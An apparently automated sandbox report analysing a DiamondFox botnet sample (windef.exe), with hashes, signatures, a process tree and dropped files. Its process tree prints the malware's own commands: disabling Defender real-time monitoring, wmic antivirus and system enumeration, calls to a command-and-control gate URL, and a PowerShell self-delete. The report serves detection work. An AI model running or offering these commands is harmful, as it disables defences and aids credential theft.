Analysis
-
max time kernel
131s -
max time network
139s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
04-07-2021 00:03
Static task
static1
Behavioral task
behavioral1
Sample
windef.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
windef.exe
Resource
win10v20210408
General
-
Target
windef.exe
-
Size
203KB
-
MD5
a1e165e1926c0c83123c89fce6b1af56
-
SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f
-
SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
-
SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
Malware Config
Signatures
-
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
DiamondFox payload 10 IoCs
Detects DiamondFox payload in file/memory.
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox -
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/676-209-0x000000000044412E-mapping.dmp MailPassView behavioral2/memory/676-211-0x0000000000400000-0x0000000000455000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/2284-196-0x00000000004466F4-mapping.dmp WebBrowserPassView behavioral2/memory/2284-198-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView -
Nirsoft 6 IoCs
Processes:
resource yara_rule behavioral2/memory/2284-196-0x00000000004466F4-mapping.dmp Nirsoft behavioral2/memory/2284-198-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft behavioral2/memory/2320-206-0x0000000000413E10-mapping.dmp Nirsoft behavioral2/memory/2320-208-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft behavioral2/memory/676-209-0x000000000044412E-mapping.dmp Nirsoft behavioral2/memory/676-211-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft -
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
Processes:
MicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exelocalmgr.exepid process 3128 MicrosoftEdgeCPS.exe 2284 MicrosoftEdgeCPS.exe 1184 MicrosoftEdgeCPS.exe 2320 MicrosoftEdgeCPS.exe 676 MicrosoftEdgeCPS.exe 3356 MicrosoftEdgeCPS.exe 1020 MicrosoftEdgeCPS.exe 3064 MicrosoftEdgeCPS.exe 3116 MicrosoftEdgeCPS.exe 2940 localmgr.exe -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 412 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 8 IoCs
Processes:
MicrosoftEdgeCPS.exedescription pid process target process PID 3128 set thread context of 2284 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 set thread context of 1184 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 set thread context of 2320 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 set thread context of 676 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 set thread context of 3356 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 set thread context of 1020 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 set thread context of 3064 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 set thread context of 3116 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3216 taskkill.exe 4064 taskkill.exe 1552 taskkill.exe 2060 taskkill.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 3652 notepad.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exepid process 508 powershell.exe 412 powershell.exe 412 powershell.exe 508 powershell.exe 412 powershell.exe 508 powershell.exe 3128 MicrosoftEdgeCPS.exe 3128 MicrosoftEdgeCPS.exe 2284 MicrosoftEdgeCPS.exe 2284 MicrosoftEdgeCPS.exe 2284 MicrosoftEdgeCPS.exe 2284 MicrosoftEdgeCPS.exe 2320 MicrosoftEdgeCPS.exe 2320 MicrosoftEdgeCPS.exe 3128 MicrosoftEdgeCPS.exe 3128 MicrosoftEdgeCPS.exe 3128 MicrosoftEdgeCPS.exe 3128 MicrosoftEdgeCPS.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wmic.exepowershell.exewmic.exedescription pid process Token: SeIncreaseQuotaPrivilege 2284 wmic.exe Token: SeSecurityPrivilege 2284 wmic.exe Token: SeTakeOwnershipPrivilege 2284 wmic.exe Token: SeLoadDriverPrivilege 2284 wmic.exe Token: SeSystemProfilePrivilege 2284 wmic.exe Token: SeSystemtimePrivilege 2284 wmic.exe Token: SeProfSingleProcessPrivilege 2284 wmic.exe Token: SeIncBasePriorityPrivilege 2284 wmic.exe Token: SeCreatePagefilePrivilege 2284 wmic.exe Token: SeBackupPrivilege 2284 wmic.exe Token: SeRestorePrivilege 2284 wmic.exe Token: SeShutdownPrivilege 2284 wmic.exe Token: SeDebugPrivilege 2284 wmic.exe Token: SeSystemEnvironmentPrivilege 2284 wmic.exe Token: SeRemoteShutdownPrivilege 2284 wmic.exe Token: SeUndockPrivilege 2284 wmic.exe Token: SeManageVolumePrivilege 2284 wmic.exe Token: 33 2284 wmic.exe Token: 34 2284 wmic.exe Token: 35 2284 wmic.exe Token: 36 2284 wmic.exe Token: SeIncreaseQuotaPrivilege 2284 wmic.exe Token: SeSecurityPrivilege 2284 wmic.exe Token: SeTakeOwnershipPrivilege 2284 wmic.exe Token: SeLoadDriverPrivilege 2284 wmic.exe Token: SeSystemProfilePrivilege 2284 wmic.exe Token: SeSystemtimePrivilege 2284 wmic.exe Token: SeProfSingleProcessPrivilege 2284 wmic.exe Token: SeIncBasePriorityPrivilege 2284 wmic.exe Token: SeCreatePagefilePrivilege 2284 wmic.exe Token: SeBackupPrivilege 2284 wmic.exe Token: SeRestorePrivilege 2284 wmic.exe Token: SeShutdownPrivilege 2284 wmic.exe Token: SeDebugPrivilege 2284 wmic.exe Token: SeSystemEnvironmentPrivilege 2284 wmic.exe Token: SeRemoteShutdownPrivilege 2284 wmic.exe Token: SeUndockPrivilege 2284 wmic.exe Token: SeManageVolumePrivilege 2284 wmic.exe Token: 33 2284 wmic.exe Token: 34 2284 wmic.exe Token: 35 2284 wmic.exe Token: 36 2284 wmic.exe Token: SeDebugPrivilege 412 powershell.exe Token: SeIncreaseQuotaPrivilege 3836 wmic.exe Token: SeSecurityPrivilege 3836 wmic.exe Token: SeTakeOwnershipPrivilege 3836 wmic.exe Token: SeLoadDriverPrivilege 3836 wmic.exe Token: SeSystemProfilePrivilege 3836 wmic.exe Token: SeSystemtimePrivilege 3836 wmic.exe Token: SeProfSingleProcessPrivilege 3836 wmic.exe Token: SeIncBasePriorityPrivilege 3836 wmic.exe Token: SeCreatePagefilePrivilege 3836 wmic.exe Token: SeBackupPrivilege 3836 wmic.exe Token: SeRestorePrivilege 3836 wmic.exe Token: SeShutdownPrivilege 3836 wmic.exe Token: SeDebugPrivilege 3836 wmic.exe Token: SeSystemEnvironmentPrivilege 3836 wmic.exe Token: SeRemoteShutdownPrivilege 3836 wmic.exe Token: SeUndockPrivilege 3836 wmic.exe Token: SeManageVolumePrivilege 3836 wmic.exe Token: 33 3836 wmic.exe Token: 34 3836 wmic.exe Token: 35 3836 wmic.exe Token: 36 3836 wmic.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
MicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exepid process 1184 MicrosoftEdgeCPS.exe 1020 MicrosoftEdgeCPS.exe 3064 MicrosoftEdgeCPS.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
windef.exeMicrosoftEdgeCPS.exedescription pid process target process PID 804 wrote to memory of 3128 804 windef.exe MicrosoftEdgeCPS.exe PID 804 wrote to memory of 3128 804 windef.exe MicrosoftEdgeCPS.exe PID 804 wrote to memory of 3128 804 windef.exe MicrosoftEdgeCPS.exe PID 804 wrote to memory of 412 804 windef.exe powershell.exe PID 804 wrote to memory of 412 804 windef.exe powershell.exe PID 804 wrote to memory of 412 804 windef.exe powershell.exe PID 3128 wrote to memory of 508 3128 MicrosoftEdgeCPS.exe powershell.exe PID 3128 wrote to memory of 508 3128 MicrosoftEdgeCPS.exe powershell.exe PID 3128 wrote to memory of 508 3128 MicrosoftEdgeCPS.exe powershell.exe PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 3836 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 3836 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 3836 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 2880 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 2880 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 2880 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 2288 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 2288 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 2288 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 3536 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 3536 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 3536 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 804 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 804 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 804 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 2256 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 2256 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 2256 3128 MicrosoftEdgeCPS.exe wmic.exe PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 2284 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 1184 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 1184 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 1184 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 1184 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 1184 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 1184 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 1184 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 1184 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 2320 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 2320 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 2320 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 2320 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 2320 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 2320 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 2320 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 2320 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 2320 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 676 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 676 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 676 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 676 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 676 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 676 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 676 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 3128 wrote to memory of 676 3128 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\windef.exe"C:\Users\Admin\AppData\Local\Temp\windef.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 13⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" os get caption /FORMAT:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get caption /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\1.log"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\4.log"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\2.log"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\3.log"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
-
C:\Windows\notepad.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\write.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 3356 /F3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 3064 /F3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 3116 /F3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 1020 /F3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵
-
C:\Users\Admin\AppData\Local\Temp\localmgr.exe"C:\Users\Admin\AppData\Local\Temp\localmgr.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\windef.exe' -Force -Recurse2⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
db01a2c1c7e70b2b038edf8ad5ad9826
SHA1540217c647a73bad8d8a79e3a0f3998b5abd199b
SHA256413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d
SHA512c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
775d05c534102b36882b4510f60680c5
SHA117fb67ef5233efcc2cbcfd54ce8bbe2176938793
SHA256893ed03ced03806745236aef746b223ecbf295dfac6d9d78007876131f9c6d80
SHA51298b328930f78cbad665001c75a9dc2e643554e02ab62dfd5531b5483e45851c1c73a6a4cf272ee65ac3c95ef43b491cd3fd062115fcf38591c3478c564e2f1d6
-
C:\Users\Admin\AppData\Local\Temp\1.logMD5
4ab56e327e56a995c158a6116430835b
SHA1bf39dbae7798cc8bd7d7073998b09652412b111b
SHA256269c32926bf6faebe0581c23903f8dc8cef41ad46b333435d038b81d47f4785e
SHA51237704769bf293cd6a9c0ccbec359fbb7278f163911d3f2ae27f6c9c3dece55be70c2c5695be953def5984b7eda05953b19581df236c44d5d269cf258e49ab4af
-
C:\Users\Admin\AppData\Local\Temp\localmgr.exeMD5
f4f7f1f8b8f893bdd621f425646919a5
SHA1cc1ccc560723692407ce86972865a956faa62229
SHA256fd8ef0b8b997038aa6a4a416298965545e24f6367e364e58ebd6343515b73c8a
SHA5127621478e0d0e3036682e76e7db3675d5053a4decff033d75c9608744245b91b970a937f3006f80c6262408f8072b06b74af606c88d4c9a951eda88320275fc03
-
C:\Users\Admin\AppData\Local\Temp\localmgr.exeMD5
f4f7f1f8b8f893bdd621f425646919a5
SHA1cc1ccc560723692407ce86972865a956faa62229
SHA256fd8ef0b8b997038aa6a4a416298965545e24f6367e364e58ebd6343515b73c8a
SHA5127621478e0d0e3036682e76e7db3675d5053a4decff033d75c9608744245b91b970a937f3006f80c6262408f8072b06b74af606c88d4c9a951eda88320275fc03
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\id.confMD5
6df6af7665efdfe5fdfabd83153001d7
SHA137a94a6a446082bba9c2ec0ecfc3b8960bf95085
SHA256986686ce26c1c60d688174cddca881de7c6874bca4e5e6db2fd1dd5b29fc14ba
SHA5120a97a8ca010550e8487b0586357b7e8dd6ce1d20fe2acbce7c9e0c5cba04760b9364995ac336a4fcfe9036e317972557bb38e7192defe32655d796eb6421fcb4
-
C:\Users\Admin\AppData\Roaming\EdgeCP\wallet.confMD5
69bf7238c8e32793411515d8ca5926a9
SHA1d6918bcceab927a036b760a82cadd340d83b8ed1
SHA25657df56c1be46da0057f1afe0147ac7a700fa4df393bf0b31cabd158939d1cb66
SHA5124a3f787a09c553dd6012d0529644d9b0e7ac672be032eead2d7f9db9a64ce46f315ae01771f893d35160cc597e7df2fab2b600f6b3ff5e97ca8df403699299f3
-
memory/412-126-0x0000000007840000-0x0000000007841000-memory.dmpFilesize
4KB
-
memory/412-140-0x0000000008130000-0x0000000008131000-memory.dmpFilesize
4KB
-
memory/412-143-0x0000000008480000-0x0000000008481000-memory.dmpFilesize
4KB
-
memory/412-137-0x0000000008050000-0x0000000008051000-memory.dmpFilesize
4KB
-
memory/412-135-0x0000000007EE0000-0x0000000007EE1000-memory.dmpFilesize
4KB
-
memory/412-133-0x00000000077F0000-0x00000000077F1000-memory.dmpFilesize
4KB
-
memory/412-130-0x0000000007202000-0x0000000007203000-memory.dmpFilesize
4KB
-
memory/412-157-0x0000000009DF0000-0x0000000009DF1000-memory.dmpFilesize
4KB
-
memory/412-162-0x0000000009580000-0x0000000009581000-memory.dmpFilesize
4KB
-
